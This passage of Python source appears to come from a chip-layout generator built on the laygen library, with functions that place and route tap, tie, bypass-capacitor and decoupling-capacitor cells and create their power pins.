placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_nmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_plugged_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_tap, devname_pmos_tap, devname_plug, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2=routing_grid_m1m2 # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin) iplug0 = laygen.place("I"+objectname_pfix + 'PLUG0', devname_plug, pg, xy=origin) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_tap, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #tap route xy_tap0 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) xy_tap1 = laygen.get_template_pin_xy(in0.cellname, 'TAP0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2) laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in0.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip0.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in0.name) # power pin if create_pin==True: rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R"+objectname_pfix+"VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tie(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route # horizontal route style # input for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) # vdd/vss if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0])) rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #align output to input pin # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) # pin rvdd0_pin_xy = laygen.get_xy(obj = rvdd, gridname = rg_m2m3_pin, sort=True) rvss0_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m2m3_pin, sort=True) rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvdd0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 rvss0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvss0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 if create_pin == True: laygen.pin(name='TIEVDD', layer=laygen.layers['pin'][3], xy=rvdd0_pin_xy, gridname=rg_m2m3_pin, netname='VDD') laygen.pin(name='TIEVSS', layer=laygen.layers['pin'][3], xy=rvss0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') # power pin rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VDD0"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS0"), gridname = rg_m1m2) laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2) laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2) def generate_tie_wovdd(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in0b = laygen.relplace(name = "I"+objectname_pfix+'N0B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') in1b = laygen.relplace(name = "I"+objectname_pfix+'N1B', templatename = devname_nmos_body, gridname = pg, refinstname = in0b.name, transform='MX', shape=np.array([m, 1])) in2b = laygen.relplace(name = "I"+objectname_pfix+'N2B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1b.name, transform='MX') # route # horizontal route style # input for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1b.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refpinname1='D0', refinstindex1=np.array([i, 0]), ) # vdd/vss if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), ) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3) rvss = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S0', refinstindex1=np.array([0, 0])) rvdd = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([m-1, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0])) #align output to input pin # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0b.name, refinstname1=in2b.name) laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1b.name, refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1b.name, gridname=rg_m1m2,refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1b.name, refinstindex0=np.array([m-1, 0]), refinstname1=in1b.name, refinstindex1=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1b.name, gridname=rg_m1m2,refinstindex=np.array([m-1, 0])) # pin rvdd0_pin_xy = laygen.get_xy(obj = rvdd, gridname = rg_m2m3_pin, sort=True) rvss0_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m2m3_pin, sort=True) rvdd0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvdd0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 rvss0_pin_xy[0][1] = rvss0_pin_xy[0][1] - 1 rvss0_pin_xy[1][1] = rvss0_pin_xy[1][1] + 1 if create_pin == True: laygen.pin(name='TIEVSS2', layer=laygen.layers['pin'][3], xy=rvdd0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') laygen.pin(name='TIEVSS', layer=laygen.layers['pin'][3], xy=rvss0_pin_xy, gridname=rg_m2m3_pin, netname='VSS') # power pin rvdd_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS1"), gridname = rg_m1m2) rvss_pin_xy = laygen.get_xy(obj =laygen.get_rect(name = "R" + objectname_pfix + "VSS0"), gridname = rg_m1m2) laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2, netname='VSS') laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS') def generate_bcap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) if m > 1: #gate laygen.route(None, laygen.layers['metal'][2], xy0=xy_g0, xy1=xy_g0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_g0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) rg0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) #drain laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I'], rect_list=[rg0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_space, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip1b = laygen.relplace(name = "I"+objectname_pfix+'P1B', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') # route #pdict = [laygen.get_inst_pin_xy(None, None, rg_m1m2, index=np.array([i, 0])) for i in range(m)] xy_g0 = laygen.get_template_pin_xy(in1.cellname, 'G0', rg_m1m2)[0, :] xy_d0 = laygen.get_template_pin_xy(in1.cellname, 'D0', rg_m1m2)[0, :] xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) #laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m1m2, # refinstname0=ip1.name, refinstindex0=np.array([i*2, 0]), via0=[[0, 0]], # refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_g0*np.array([1, 0]), xy1=xy_g0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1*np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), via0=[[0, 0]], refinstname1=in1.name, refinstindex1=np.array([i, 0])) if m > 1: laygen.route(None, laygen.layers['metal'][2], xy0=xy_d0, xy1=xy_d0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([0, 0]), refinstname1=in1.name, refinstindex1=np.array([m-1, 0])) for i in range(m): laygen.via(None, xy_d0, refinstname=in1.name, refinstindex=np.array([i, 0]), gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_dcap2(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=2, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 m = max(1, int(m / 2)) # using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, 